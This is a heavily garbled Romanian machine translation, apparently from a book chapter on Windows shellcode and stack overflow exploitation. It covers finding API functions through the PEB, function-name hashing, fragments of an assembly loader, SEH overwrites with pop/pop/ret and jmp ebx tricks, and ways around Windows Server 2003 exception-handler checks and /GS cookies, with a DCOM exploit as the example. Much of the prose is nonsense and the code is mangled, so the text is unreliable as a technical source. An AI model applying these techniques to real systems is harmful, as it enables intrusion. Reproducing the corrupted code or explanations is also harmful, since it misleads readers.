Control LA progres ііпікаііпя implementate cod pentru linux tu trebuie sa au fost nu-i rău maestru ac-i hmO'ier pentru x Are sens scrie implementate Codul pentru Win Cu aplicarea igh la fel unelte, ce și pentru linux Dacă tu învăța bucură-te unu unelte pentru solutii toate sarcini, în termen lung perspectivă aceasta este se va simplifica ta muncă prin urmare cu greu dacă cheltuieli Cumpără Vizual Studio special pentru scris implementate cod Cygwin (www cygwin org/) — bun (și la al -lea la fel liber) instrument pentru acest Mulți specialişti prefer-ii NASM sau alte asamblatori, dar Cu Ajutor aceste unelte de obicei eu minereuri dar scrie auxiliar funcții și conduce Test compilare ATENŢIE - Între principal soiuri asamblator sintaxă (AT&T și Intel) exista Două major diferențe In primul rand, în sintaxă AT&T folosit mnemonice "o sursă, receptor", apoi Cum în sintaxă Intel — mnemonice "receptor, o sursă" aceasta poate apel confuzie la comun aplicarea utilitati (iNU gaz (AT&T) și OllyDbg sau alții utilitati ferestre, de sprijin sintaxă Iniei Dar chiar dacă tu învăța mintal rearanja operanzi, exista Mai mult unu important diferență, cu privire la sintaxă adresarea II adresarea x implicat Două Inregistreaza-te, adăugat părtinire și greutate public coeficient, care poate a fi egală , patru sau Comanda mov eh, [ecx+ebx* ]+ ] (în sintaxă Intel pentru OllyDbg) este echivalent cu echipă mov (%ecx,%ebx, ),%eax în sintaxă asamblator GNU (AT&T) eu In absenta vedere autorii mai bine explora și aplica sintaxă AT&T pe unu simplu motiv — el lipsit ambiguitate Hai sa luam comanda mov eh, [exx+ebx] Care Inregistreaza-te este de bază, și care conţine pe scară largă coeficient? aceasta (și yubenno semnificativ la restricţie compoziţie folosit simboluri, deoarece •dar comenzi după schimburi registre uite asemănătoare dar difuzat în de comun acord diferit mașinărie coduri Pregătirea eu i pіnaya problemă la scris implementate cod pentru Windows este n ceva, ce Win nu prevede direct acces la sistemică funcții La ik nici (chraypo, aceasta este prescripţie a fost făcut intentionat Mulți limitări 'noi Windows de multe ori întoarceţi-vă se virtuti LA dat caz qi іr іoіchiki Win a primi posibilitate corect sau extinde pesos inuriiiiiii interfata API intern sistemică functii, nu încălcând lucru aplicatii, folosind nivel inalt interfata Win API l i i - knchѵііа la mic fragment mașinărie cod, lucru în alții prmiramms, ta implementate Codul ar trebui să do considerabil muncă: Capitol Introdus Codul pentru Windows despre găsi necesar funcții Win API și construi masa apeluri; despre Descarca biblioteci, necesar pentru conexiuni; despre conectați la la distanta Server Descarca adiţional porţiune implementate cod și a executa a lui; despre "pur" complet muncă, continuând performanţă proces sau corect completând a lui; despre împiedica completare alții program fluxuri; despre a corecta unu sau niste grămezi pentru utilizare funcții win , lucru Cu morman Mai devreme Căutare necesar funcții Win API redus la simplu greu codificare ("firmware") în implementate cod sau adrese înșiși funcţie-, țiuni, sau adrese GetProcAddressA() și LoadLibraryA() pentru specific versiune, Windows Rigid codificare inainte de acum de cand ramane unu din cel mai rapid metode implementare, dar la -l mânca defect — legare la specific versiuni executabil fişier sau Windows Și Toata lumea la fel, Cum predat ne vierme trânti, greu codificare adrese uneori poate a fi util NOTĂ - - original text Slammer uşor găsi în Internet aceasta bun exemplu greu codificare adrese La a evita dependențe din specific configurație executabil fișiere sau OS, Necesar alte trucuri unu din trucuri căutare funcții bazat pe emulare metodă, folosit comun biblioteci DLL pentru conexiuni la proces Cu exceptia A merge, poate sa căutare în memorie bibliotecă kernel dll și găsi pentru a ei bloc mediu inconjurator proces (Proces Mediu inconjurator bloc, REV); apropo, aceasta este de multe ori practicat chinez hackeri Mai tarziu în acest capitol va fi afișate Cum utilizare sistem prelucrare excepții Windows pentru căutare în memorie Analiză bloc HOHOTE Următorul exemplu împrumutat din implementate cod, inițial folosit pentru produs PÂNZĂ Inainte de Cum trece peste la linie cu linie analiză, ar trebui să stiu despre niste arhitectural deciziilor admis la în curs de dezvoltare cod: despre Fiabilitate A fost considerat cheie factor Codul ar trebui să a fost muncă mereu, fără orice extern dependențe despre La fel a fost important posibilitate extensii Logic, de inteles Codul Mai uşor modifica în caz niste neprevăzut circumstanțe despre Cum mai compact implementate Codul, subiecte mai bine — volum important mereu Tem nu Mai puțin, reducere volum implementate cod cere timp la la asta la fel Codul devine mai confuz și Cu -l dificil muncă din cauza acest redus Mai departe fragment relativ Grozav Problemă va fi rezolvat polpse nasred Analiză bloc HOHOTE G pitic căutare structurilor SEH (Structurat Excepție manipulator) Dar dacă pentru tine vrei practică în studiu x și optimiza acest Codul — Vă rog, nu ezita Asa de Cum Codul este tu simplu fișier c, prelucrate compilator gcc, el poate a fi scris și compilate pe orice platformă x , sprijinit gcc hai sa hai sa analizam program heapoverflow c şir pe stro-ііоіі și sa vedem, Cum ea lucru Fişier Heapoverflow c eu Іаіinm primul Etapa trebuie sa a fi includere antet ferestre h aceasta trebuie sa zile A merge, la la nevoie noi ar putea scrie Codul, specific pentru \Vip // Publicat pe conditii licențe GNU PUBLIC LICENȚĂ v O //include //include // fdef Win //include //endif lai hmm ar trebui să funcţie, care este tu subţire coajă pentru comenzi compilator gcc — în dat caz comenzi asm() Cu echipe a stabilit Aceste comenzi nu Genera cod și nu ocupa de prisos spaţiu în memorie; ei Total numai crea convenabil loc pentru definiții constante, care furios i folosit în implementate cod vo i d v eu $NUMBEROFMS VCRTFUNCTI ONS, Da eu - i MSVCRTHASHESTABLE-geteip(^ebx)desi Ir i MSVCRTFUNCTIONSTABLE-geteip(^ebx) edi •|ГІ lll' vcrtfunctl ons • pir lil (ftesl) pn'ilil SMSVCRTHASH %edx,^edx ir donewlthrecvloop ippr callrecvloop donewlthrecvloop // Completare recvloop pop Zedi pop — Zedx mov ^ebp, /cesp pop Zebp i ol x USD // ( II C FUNCȚII G lavă Introdus Codul pentru Windows Următorul funcţie primeste adresa indicator pe funcţie din hash nume funcții și DLL Probabil, aceasta este cel mai de neînţeles funcţie în toata lumea implementate cod, deoarece ce ea execută mare parte muncă foarte neconvențional manieră LA a ei folosit apoi circumstanţă, ce în timp împlinire programe Windows pe abordare fs:[Ox O] stocate indicator pe bloc mediu inconjurator programe (REV) pe la care poate sa găsi Toata lumea module, încărcat în memorie Noi succesiv sortarea module și cauta modul Cu Nume kernelL dll dll comparaţie coduri hash Funcții hashing transmise simplu steag pentru comutarea între hashing linii Unicode și simplu linii ASCII Vă rugăm să rețineți ce în Internet publicat destul de putine implementari acest proces — și niste din lor mai compact alții De exemplu, în cod Alvara fulg (Halvar Fulg sunt utilizate pe biți coduri hash pentru economii locuri; analiză Antet PE pentru primind dorit indicatoare la fel poate efectuate diferit moduri Cu exceptia A merge, a analiza Antet PE pentru toate funcții nu trebuie sa — suficient găsi funcţie GetProcAddress() și utilizare pentru primind toate restul /* fs[ x ] - indicator pe HOHOTE *acea + os - indicator pe PEB LDR DATA *acea + os - indicator pe listă module în bine descărcări */ Pe adiţional informație a lua legatura pe adrese www builder cz/art/ assembler/anti procdump html și www onebull org/document/doc/win kmodules htm LA general formă procedură arata Asa de: A primi Antet PE din actual modul (fs:Ox O) Merge la Antet RE Merge la masa export și a primi sens nbase patru A primi arrayOfNames și găsi funcţie // gol* GETFUNCADDRESS( int hashl lnt hash ) /* START CODA PRIMIREA ADRESELE */ // Argumente // hash dll // hash funcții // se intoarce adresa funcții getfundaddress pushl %ebp movl %esp,%ebp pushl %bx pushl £esi pushl %edi pushl %ecx pushl Ne ( x ) popi %eax // Test Da, da // JS WIN X Analiză bloc HOHOTE N I Și export masa // x - xd = x pe date OllydDbg movl x (^eax),%ebx reer da Apăsaţi %eax hl $edx // adăuga la masa adrese export // pentru primind RVA real adrese adăuga £edx ecx // adăuga la de bază abordare pentru primind real adrese adăuga Desh) Deah // Gata, adresa stocate în ea! popi ^ex popi %ed popi %es popi £ebx mov %ehpDesp pop %ebp ret USD /(Mai mult este dată simplu funcţie hashing, ignorând Inregistreaza-te Sim- nolov: // Funcţie hashit // Primeste argument // Creştere pentru Unicode/ASCII // hash pentru comparatii // Adresa linii hashit: pushl %ebp movl ^esp ^ebp Apăsaţi %ecx Apăsaţi %bx Apăsaţi %edx porc daxdesx porc yehhdehh xor ^edx ^edx mov Debp) Moarte hashloop• inovb Moarte), £dl // transformare simbol la top Inregistreaza-te sau x USD dBi adăuga „^(NXDOBX Capitol Introdus Codul pentru Windows shl $ Debx // Adăuga creştere la index // pentru unicode, pentru ASCII addl (%efp)deah mov (^eah)Ds! Test %cl Dsi loopnz hashloop xor ^eax ^eax mov (^ebp)Dex cmp ^exDebx jz donehash // Nepotrivire atribui eax==l Inc £eax terminat pop £edx pop ^ebx pop ^ecx mov ^ebp ^esp pop ^ebp ret USD ȘI Aici program hashing pe limba DIN, care aplicat pentru generatoare hashes, folosit în depus cod Bun practic orice funcţie hashing; noi ales acest pe mic marimea și simplitate implementare pe asamblator: #include malndnt argc char **argv) { char * p nesemnat int hash, Dacă (argc /L L Publicat pe conditii GPL V O A Drepturi de autor Imunitate Inc - I' v eu t i UE Capitol? Introdus Codul pentru Windows La apel din grămadă recuperat patru argument except handler( struct EXCEPTION RECORD *ExceptionRecord, gol * stabilitorFrame, struct CONTEXT *ContextRecord gol * DlspatcherContext ); typedef struct CONTEXT { DWORD steaguri de context, DWORD DRO; DWORD Drl: DWORD Dr , DWORD Dr ; DWORD Dr ; DWORD Dr ; FLOATING SAVE AREA FloatSave DWORD SegG-uri; DWORD SegFs; DWORD SegEs; DWORD SegD-uri, DWORD edl: DWORD Esl: DWORD Ebx; DWORD edx, DWORD ecx; DWORD Eax DWORD Ebp; DWORD eip: DWORD SegCs DWORD Esteagurile, DWORD mai ales, DWORD SegSs, } CONTEXT, întoarcere O, la continua performanţă la apariția excepții NOTĂ - - Noi cauta TAG și TAG în verso bine, la ei nu potrivite înșiși Cu tu ce LED ar la încălcare muncă implementate cod Important înștiințare ce structura manipulator excepții (- , adresa) neapărat trebuie sa fi în grămadă actual software curgere La Schimbare ESP pentru tine Trebuie să a contribui relevante schimbări în grămadă actual curgere în informativ bloc curgere La fel necesar rezolva niste neplăcut Probleme Cu aliniere Combinaţie aceste factori crește volum implementate cod inainte de valorile mare, Cum ne dorit ar Un alt Mai mult corect strategie — instalare pentru HOHOTE blocare RtlEnterCnticaLSection Următorul cale: k= x ffdf *( nt *)k=Rt EnterCriti calSect onadd * */ #defini DOPRINT Căutare Cu folosind mecanism prelucrare excepții Windows //#defini DORUN gol shellcodeO ( /* GLOBAL DEFINIȚII */ I' IP (" a stabilit KERHEL HASH, x d e ”) /START INTRODUS CODA */ argp (" ina i nentrypoi nt • // umplere Mese indicatoare pe funcții sub x USD esp # include dword MyExceptionHandler(void) { prlntfCIn excepție handler "): ExitProcess(l): întoarcere O } int principalO { încerca { asm { // a provoca excepție xor ea, ea caii eax } } except(MyExceptionHandler()) printf("hopa ”) întoarcere ; } cheie cuvânt încerca defineste program bloc, A la apariția excepții Control transmise funcții MyExceptionHandler Când noi resetat la zero Inregistreaza-te EAH și încercând utilizare a lui pentru împlinire comenzi caii, merge mai departe excepție, și Control transmise manipulator La revărsare tampon, stocate în grămadă, impreuna cu Cu înlocuire adrese întoarcere Mai a fi înlocuit valorile alții variabile, ce în plus face dificilă exploatare vulnerabilități Imagina, ce funcţie lucru Cu niste structura, elementar adresa care stocate în Inregistreaza-te EAH, și ce părtinire interior structurilor stocate în variabil, stricat în proces substituiri adrese întoarcere Sa spunem variabil mișcări în esi, și în program efectuat comanda tip mov dword ptr[eax+esi] edx Asa de Cum revărsare nu poate conține NUL, necesar ai grijă despre volum, la nou sens variabil furnizate posibilitate înregistrări pe abordare EAX+ESI LA in caz contrar caz întâmpla încălcare acces — A aceasta este indezirabil, deoarece ce la încălcare acces va fi efectuat handler(- și) excepții; mai repede Total, aceasta este va conduce la completare curgere sau proces și imposibilitate împlinire al nostru implementate cod Dar chiar dacă problemă Cu record pe abordare EAX+ESI va fi rezolvat față întoarcere din vulnerabil funcții Mai apărea și alte asemănătoare Probleme Poate, în niste Uneori yulnonie tampon în grămadă ryh situatii decizie în general va deveni imposibil LA prezentul timp în asemănătoare situatii de obicei este înlocuit structura EXCEPTION REGISTRATION în grămadă, •nobs indicator pe manipulator excepții a fost sub al nostru Control La încălcare acces apare posibilitate intercepta Control: în calitate adrese manipulator indicat adresa bloc cod pentru întoarcere la tampon Care la fel sens ar trebui să atribui index pe manipulator pentru împlinire arbitrar cod, plasat în tampon? Răspuns pe acest întrebare depinde oi platforme și versiuni Serviciu Rask LA astfel de sisteme, Cum Windows și Windows XP fără stabilit pachete Serviciu Rusk, indicator pe actual structura EXCEPTION REGISTRATION (acea, care noi înregistrate) stocate în regre EVH LA acest caz indicator pe real manipulator excepții este înlocuit abordare, pe la care este comanda jmp ebx sau cad ebx, și apoi la implementare fictiv manipulator Control va fi transferat în al nostru structura EXCEPTION REGISTRATION Mai departe necesar scrie Acolo, Unde ar trebui să fi indicator pe Următorul structura EXCEPTION REGISTRATION, comanda mic de statura tranziție jmp prin adresa, pe la care este comanda |mp ebx Suprascris structura EXCEPTION REGISTRATION ar putea ar să arate ca iak, Cum afișate pa orez Aici indica EVH Mic de statura tranziție JMP (și comenzi nup, NOP) Indicator pe adresa, pe la care efectuat comanda JMP EVH start real cod H Orez Stivuite manipulatorii excepții ()dpako în Windows Server și Windows XP Serviciu Rusk și superior situatie se schimba Indicator pe structura EXCEPTION REGISTRATION deja nu stocate în Inregistreaza-te EVH Mai mult A merge, Toata lumea registre, anterior conținând util info m iție, resetat la zero echipă porc față provocare manipulator Probabil, com n ініія Microsoft contribuit aceste schimbări din cauza A merge, ce vierme Cod roșu folosit dubă descris mecanism pentru primind Control de mai sus servere web IIS Voi Cum aceasta este merge mai departe (fragment cod Windows XP profesional SP ): //G V porc ea, ea // B porc ebx, ebx // B B porc esi esl / / B D porc edi edi / B F pir h dword ptr [sp+ h] Capitol Revărsare în Windows F B F B Apăsaţi Apăsaţi dword ptr [sp+ h] dword ptr [sp+ h] F B B Apăsaţi dword ptr [sp+ h] F B F Apăsaţi dword ptr [sp+ h] F B caii F B E F B pop edi F B pop esi F B A pop ebx F B ret h F B E Apăsaţi ebp F B F mov ebp esp F B Apăsaţi dword ptr [ebp+OCh] F B Apăsaţi edx F B Apăsaţi dword ptr fs [ ] F B C mov dword ptr fs [ ] esp F B Apăsaţi dword ptr [ebp+ h] F B Apăsaţi dword ptr [ebp+ h] F B Apăsaţi dword ptr [ebp+OCh] F B C Apăsaţi dword ptr [ebp+ ] F B F mov ecx, dword ptr [ebp+ h] F BA caii ecx Început Cu adrese Ox F B , registre EAH, EBH, ESI și EDI resetare, pentru ce fiecare Inregistreaza-te unește eu insumi Cu tu Operațiune porc Ca urmare a, pe ce ar trebui să a desena Atenţie, — comanda caii pe abordare x F B ; performanţă continuă pe abordare Ox F B E De abordare x F B F indicator pe manipulator excepții plasat în Inregistreaza-te ECX, după ce Control transmise pe dat abordare Desigur, chiar după aceste schimbări atac poate intercepta Control — dar Asa de Cum indicator pe personalizat date deja nu stocate în Inregistreaza-te, atacator Trebuie să ghici, Unde aceste date sunt aceasta reduce probabilitate de succes muncă cod Dar Asa de dacă aceasta este? Dacă a analiza conţinut grămadă pe moment după apel manipulator excepții, noi descoperi următoarele date: despre ESP — salvat adresa întoarcere ( x F BA ); despre ESP+ — indicator pe tip excepții (OhSOOOOOOB); despre ESP+ — adresa structurilor EXCEPTION REGISTRATION În loc de substituiri indicator pe manipulator excepții abordare comenzi jmp ebx sau caii ebx suficient a inlocui a lui abordare software bloc co Următorul comenzi: pop reg pop reg ret DIN fiecare echipă pop sens ESP crește pa patru, asa de la implementare comenzi ret metru de vorbire ESP conţine indicator pe personalizat date Cheltuieli reaminti, ce comanda ret beretă adresa Cu culmi grămadă (ESP) și transmite pe -l Control Asa de modul în care atacator nu trebuie sa, la indicator pe rapel ținut în niste Inregistreaza-te, P nu trebuie sa Uiadii iii a lui adresa Revărsare tampon în grămadă eu dg găsi astfel de bloc comenzi? da în în general Unde tot ceea ce — în Sfârşit orice funcții Unde funcţie "curata pe tu " La fel de aceasta este nici minunat, unu din cel mai bun locuri poate se dovedesc a fi Codul curatenie registre pe abordare x E B : //F B pop esl //Eu B A pop ebx //[ В ret h Aplicație comenzi ret h în loc de ret nimic nu schimbări Acest comanda legume şi fructe i adiţional ajustare Inregistreaza-te mai ales, adăugând x în loc de x LA rezultat noi din nou înapoi la a lui structura EXCEPTION REGISTRATION și ( ieke La fel de și inainte de indicator pe nou structura EXCEPTION REGISTRATION ar trebui să a fi regizat pe bloc cod Cu echipă mic de statura tranziție jmp și Două de cand pentru ocolire adrese, arătând pe bloc pop/pop/ret Pentru fiecare proces Win și Pentru fiecare programatic curgere interior acest proces numit pe extrem măsura unu grămadă manipulator (aceasta este merge mai departe la lansare proces sau curgere) Asa de, mulțumită oportunități revărsare Rufer în Windows Server stivuibile manipulatorii excepții oferi (>/iii din moduri luptă Cu nou sistem protecţie grămadă, incorporat în procese, din timp cei care pe acest platformă manipulare stivuibile procesoare excepții în Windows Server manipulare stivuibile procesoare excepții poate sa sugera în calitate generalizat metodă ocolire protecţie grămadă în Windows (pe adiţional s / și, cântă informație pe acest subiect a lua legatura la secțiune "Protecţie grămadă și Windows Server") Când în Windows Server merge mai departe excepție, sistem primul verificări realitate numit manipulator Gayuim cale Microsoft încercând împiedica revărsare tampoane în grămadă Cu înlocuire informație grămadă procesoare; presupus, ce atac nu va fi capabil a inlocui indicator pa manipulator excepții și a provoca a lui apel Dar ce la fel criterii verificat realitate manipulator? Examinare efectuat cod funcții KiUserExceptionDispatcher modul NTDLL DLL Primul program controale, nu se aplică dacă indicator pe manipulator la abordare și (Revendicare Pentru verificări sunt utilizate superior și inferior adrese grămadă FS:[ ] și IS:[ ] Dacă manipulator este în acest gamă, el nu se numește Asa de oora yum, atac ne poate direct manipulator excepții Drept în hui n verificat mai departe pe listă înregistrat procesoare „IA/ICG ( nu gema de/іuchag indicator pe Antet PE imagine Cu Ajutor funcții KIIIIIIIIIaceM NeasІei și vyio / ipyaei verificare; dacă Cumpără i Ox f RE antet (Cu іаріііпй Capitol Revărsare în Windows octet câmpuri caracteristici dll) egală x , mijloace, modul se aplică la număr "nu permis ” Dacă manipulator aparține la vizate spaţiu astfel de modul, el nu se numește Mai departe indicator pe Antet PE transmise în calitate parametru funcții RtllmageDirectoryEntryToData LA dat caz ne interesat catalog configurație descărcări (sarcină configurație director) Funcţie RtllmageDirectoryEntryToData se intoarce adresa și marimea director Dacă modul nu Are catalog configurație descărcări, apoi funcţie se intoarce , mai departe verificări nu produs, și numit manipulator excepții DIN un alt mână, dacă catalog prezent, sistem verificări a lui marimea; dacă marimea catalog egală sau mai mica x , mai departe verificări nu produs, și numit manipulator excepții Asa de deplasare x octet din start catalog configurație descărcări stocate indicator pe masa adrese RVA înregistrat manipulatorii Dacă indicator egală NUL, mai departe verificări Stop, și numit manipulator excepții Asa de deplasare x octeți din start catalog stocate număr elemente în masa Dacă număr elemente egală , mai departe verificări Stop, și numit manipulator excepții Dacă Toata lumea verificări încheiat cu succes, baza adresa modul descărcări scazut din adrese manipulator; rezultat defineste sens RVA manipulator aceasta sens verificat pe listă adrese RVA în masa înregistrat manipulatorii Dacă Căutare se dovedește de succes sistem cauze manipulator; în in caz contrar caz manipulator nu se numește Ce preocupări revărsare grămadă tampoane în Windows Server, la înlocuire indicator pe manipulator excepții Poate niste Opțiuni: manipulare existent manipulator pentru transmitere management în tampon Căutare bloc cod pe abordare, nu asociat Cu modul, pentru transmitere management în tampon Căutare bloc cod în vizate spaţiu modul, nu având catalog configurație descărcări Considera aceste Opțiuni pe exemplu exploatare vulnerabilități revărsare tampon DCOM IRcmoteActivation manipulare existent manipulator Adresa x F A indica pe înregistrat manipulator excepții în NTDLL DLL Analiză cod manipulator spectacole ce prin anumit manipulare poate sa forta a lui a executa al nostru Codul Indicator pe structura EXCEPȚIE-ÎNREGISTRARE stocate pe abordare EBP+OCh: F A F mov ebx dword ptr [ebp+OCh] F A mov esi dword ptr [ebx+OCh] F A mov edi dword ptr [ebx+ ] F A lea ecx [esi+esi* ] F A mov eax dword ptr [edi+ecx* + ] F A F caii eax Revărsare tampon în grămadă La fecale gel pe structura EXCEPTION REGISTRATION plasat în Inregistreaza-te EVH Za-igm dubla cuvânt, pe care indica octeți co deplasare OxOS după EBH, mișcări în ESI Asa de modul în care mulțumită revărsare structurilor eu X(TPTION REGISTRATION noi Control conţinut ESI Apoi dubla strat- n<> co deplasare x după EVH mișcări în EDI aceasta sens la fel găsi ieya sub al nostru Control Apoi în ESC plasat adresa ESI+ESP (apoi mânca eu SO* ) Din cauza Control de mai sus ESI noi Poate sa a fi sigur în sens, care va cadea în ESH Apoi adresa, pe care indica Inregistreaza-te EDI (la fel situat sub al nostru Control), mișcări în EAH, după ce ar trebui să comanda caii pentru Inregistreaza-te EAH Controlul conţinut EDI și ESC (prin ESI), noi Poate sa a controla conţinut EAH, și Cum consecinţă — direct proces pe performanţă al nostru cod Trebuie sa numai urmă pe subiecte la în rezultat calculele EDI+ECX* + a fost primit adresa al nostru cod LA acest caz adresa va fi plasat în Inregistreaza-te EAH, și pe acest abordare va fi transferat Control La început la exploatare vulnerabilități proces svehost Locație bloc TEV și grămadă mereu cunoscut Nu cheltuieli și vorbi, ce pe ocupat Server Cu definiție aceste date Mai apărea dificultăți Dacă presupune niste constanţă, indicator pe structura EXCEPTION REGISTRATION poate sa găsi pe abordare TEV+ ( x FFDBOOO) și utilizare acest adresa pentru căutare decret gel pe al nostru Codul in orice caz Cum se dovedește direct față provocare manipulator excepții acest indicator la curent și schimbări asa de cel o abordare nu bun Tem nu Mai puțin, structura EXCEPTION REGISTRATION, pe care indica adresa TEV+ , pe abordare OxOO CF FO conţine indicator pe Paşă structura EXCEPTION REGISTRATION ȘI deoarece la primul implementare al nostru cod Locație grămadă ramane permanent, acest despre-comunitate poate sa profită Un alt indicator pe al nostru structura eu XCEPTION REGISTRATION stocate pe abordare x CF E Sa spunem noi hai sa folosim ultimul adresa Dacă salva co deplasare OxOS după al nostru structurilor EXCEPTION REGISTRATION sens x (care va fi a intrat în ESI), A co deplasare x — sens x BF F (care va fi a intrat în EDI), apoi după toate înmulțiri și adaosuri noi primim adresa x CF E Acest adresa plasat în EAH, și pe -l transmise Control Asa de noi Să mergem mai departe la abordare paşă structurilor EXCEPTION REGISTRATION, dar la care ar trebui să fi indicator pe Următorul structura EXCEPTION REGISTRATION Dacă loc Aici comanda mic de statura tranziție pe paisprezece octet din actual pozitii, noi "sa sarim peste" prin "gunoi", care a fost Necesar pentru transmitere management în da punct ()pіііsaііninyn metodă a fost testat pa patru calculatoare Cu Windows Sei ver; pe Trei a fost instalat versiune Afacere Ediție, pe unu - Standul d ediție În toate cazuri exploatare vulnerabilități a fost de succes Tem ns Mai puțin, foarte important, la Codul a fost efectuat Cu "primul apus de soare" — în in caz contrar g/oră el, mai repede Total, nu va functiona Și Mai mult unu cometariu: probabil, ayug despre excepții orneigi nrovan pa ventilator manipulatori, A ns pa sisco Capitol Revărsare în Windows Similar manipulator la fel prezent în niste alții module, Unde Oh poate cu succes fi folosit Alte înregistrat manipulatorii ex* întrerupătoare de obicei transmite Control funcții except handler , export^ ruminabil msvcrt dll, sau a ei analogic Căutare bloc cod pe abordare, nu asociat Cu modul La fel de și în toate restul versiuni ferestre, pe abordare ESP+ poate sa găsi decret Tel pe al nostru structura EXCEPTION REGISTRATION Prin urmare, dacă noi nai dem Următorul bloc comenzi pe abordare, nu asociat nici Cu unu Descarca femei modul, el ne destul de potrivi: pop reg pop reg ret Astfel de bloc comenzi poate sa găsi pe toata lumea calculator Cu Windows Server Afacere Ediție pe abordare x FFC AC Deoarece cel adresa nu asociere dubă pi Cu unu modul, acest fictiv manipulator va trece verificare sistem noi Securitate și va fi efectuat Tem nu Mai puțin, problemă Toata lumea la fel exista Pe prieten calculator Cu sistem Windows Server standard Ediție bloі pop/pop/ret poate fi nu pe la asta la fel abordare, A Total numai aproape despre' l Deoarece corect Locație bloc pop/pop/ret nu garantat aplica aceasta este decizie nu recomandat În loc de bloc pop/pop/ret poate sa pe încerca găsi în vizate spaţiu vulnerabil proces comanda caii dword ptg[esp+ ] Sau comanda jmp dword ptr[esp+ ] Pe practică găsi astfel de comenzi Cu potrivit adrese nu a reusi, dar singur din Caracteristici mecanism prelucrare excepții include în volum, ce noi lu bijuterie găsi o multime de indicatoare pe structura EXCEPTION REGISTRATION Vino mai aproape; vărsături din adrese ESP și EURO Aici numai niste posibil Opțiuni: esp+ esp+ esp+IC esp+ C esp+ esp+ ebp+Oc ebp+ ebp+ ebp- ebp-C ebp- Orice din aceste combinatii poate a fi folosit în echipă caii sau jmp, La analiză vizate spaţiu proces svchost noi pe abordare x VOVOV găsi astfel de comanda: caii dword ptr[ebp+ x ] Revărsare tampon în grămadă eu II> abordare EUR + GA este indicator pe al nostru structura EXCEPTION REGISTRATION ihni adresa nu asociate nici Cu unu modul; Mai mult A merge, practic în în e\ proceselor Windows Server (A la fel mulți proceselor Windows XP) nici i vom castiga singur și acestea la fel octeți; în restul cazuri acest "comanda" este Nici i/ip # include Protecţie grămadă și Windows Server zero principalO ( FILETIME ft; nesemnat int cookie= , nesemnat int tmp=O, nesemnat int *ptr= : LARGE INTEGER perfcount; GetSystemTimeAs fi eTi eu(&ft); prăjitură = ft dwHighDateTime ft dwLowDateTime: prăjitură = prăjitură GetCurrentProcessId(): prăjitură = prăjitură GetCurrentThreadId() prăjitură = prăjitură * GetTickCount(), QueryPerformanceCounter(&perfcount), ptr = (nesemnat int)&perfcount tmp = *(ptr+l) *ptr prăjitură = prăjitură tmp printf("Cookie OX\n" Cookie): întoarcere : t ('start numit funcţie GetSystemTimeAsFileTime Ea umple structura eu ULTIME Cu Două câmpuri dwHighDateTime și dwLowDateTime Aceste Două valorile Unit Operațiune porc Mai departe rezultat unește Operațiune porc eu identificator proces, care în Ale mele întoarce unește Cu identificator software curgere și cantitate milisecunde trecut Cu mo-mepiah lansa sisteme (sens determinat provocare GetTickCount) LA completare numit funcţie QueryPerformanceCounter, primind indicator pe G pic întreg număr Ultimul lucru este împărțit pe Două pe de biți numere, care la fel uni Operațiune porc; rezultat defineste sens de protecţie date cookie-uri, conservat în secțiuni date fişier imagine Steagul/GS la fel schimbări Ordin cazare în grămadă local variabile Mai devreme variabile adăpostit în bine lor definiții în original De la catre- /IG, A acum matrice se misca în sfarsit listă variabile, mai aproape la abordare întoarcere Logici este simplu: dacă în program întâmpla revărsare, aceasta ns strica valorile alții variabile Decizie Are Două major Beneficii — aceasta ajută împiedica joc de inteligență încălcări, A la fel schimb arbitrar adrese în volum caz, dacă aglomerat variabil noapte jav indicator eu I ichem Cu primul Beneficii Imagina program, necesită autentificare utilizator; funcţie, în care produs autentificare, vulnerabil pentru revărsare Dacă autentificare a trecut cu succes, dubla i cur atribuit sens , A în caz eșecuri dubla cuvânt resetează eu ( iii relevante variabil stocate în tampon, în care a avut loc revărsare, atac poate atribui variabil sens DIN puncte i|n ііпя programe Toata lumea va fi să arate ca Asa de, ca utilizator a trecut Ay gena i ficare, cu toate că pe se faptă el nu introdus valabil Nume și parola La întoarcere din proceduri, protejat de protecţie date cookie-uri, sistem Verifica sens și lor date și compară a lui co valoare, usianov spumos Capitol Revărsare în Windows în din timp proces Referinţă copie de protecţie date prăjitură stocate în secțiuni date fişier imagine relevante proceduri Sens de protecţie date prăjitură în grămadă plasat în Inregistreaza-te ESC și comparat Cu copie din secțiuni date Aici apare primul problemă, despre care noi Hai să vorbim puțin mai tarziu, Dacă valorile de protecţie date prăjitură nu se potrivesc, Codul, realizând Verifica, cauze manipulator încălcări protecţie (dacă el a fost definit) Uka-' contribuitor pe manipulator stocate în secțiuni date fişier imagine vulnerabil proceduri Dacă indicator nu egală NUL, el plasat în Inregistreaza-te EAH, după ce, merge mai departe difuzat management pe conţinut Inregistreaza-te Aici apare al doilea problemă Dacă manipulator încălcări protecţie nu a fost determinat apoi Control transmise funcții UnhandledExceptionFilter Ea nu pur şi simplu completare-i Nu proces, A execută niste actiuni și cauze variat funcții La a primi detaliat informație despre volum, ce face funcţie Unhandled-j ExceptionFilter, petrece Test sesiune în IDA Pro LA general Caracteristici sa spunem ce! funcţie încărcături bibliotecă faultrep dll și execută funcţie Raportați defecțiune,) exportate acest bibliotecă Printre alte acest funcţie răspunsuri pe în-i fenomen fereastră, ofranda a raporta despre greşeală în Microsoft Tu într-o zi întâlnite Cu numit canale PCHangRepExecPipe și PCHFault-i RepExecPipe? Sunt sunt utilizate în Raportați defecțiune hai sa hai sa ne intoarcem la menționat Probleme și sa vedem, De ce ei într-adevăr sunt Probleme Mai bine Total do aceasta este pe specific exemplu Considera Următorul (foarte sofisticat) original cod C: #include # include MÂNER hp=NULL, int ReturnHostFromUrl(car **, char *), int principalO char *ptr = NUL hp = HeapCreate(O, x , x ), ReturnHost-FromUrl(&ptr,"http //www ngssoftware com/index html"): printfCHost este £s",ptr): HeapFree (hp O ptr) întoarcere int ReturnHostFromUrl(car **buf, char *url) { int numara = ; char *p = NUL, char buffer[ ]="" // A primi indicator pe start Nume hosta R = strstr(url,"http //"), daca(!p) întoarcere , R = R + Protecţie grămadă și Windows Server // Alerga operațiuni Cu local copie strcpy(tampon,p), // dar abordare x (FreeListfO) Flink) stocate indicator co sens x (primul liber bloc); > dar abordare x C (FreeListfO) Clipi) stocate indicator co sens x (primul liber bloc); ■" dar abordare x (primul liber bloc) stocate indicator co sens x (FreeListFO]); » dar abordare x C (primul liber bloc + patru) stocate decret co yishchiem x (FreeListfO]) Capitol Revărsare în Windows La alocare memorie (de exemplu, în rezultat apel RtlALLocateHeap Cu cerere despre alocare octet memorie) indicatoare FreeList[O] Flink și FreeList[O] Blink despre mine sunt în curs de actualizare Asa de, la ei citat pe 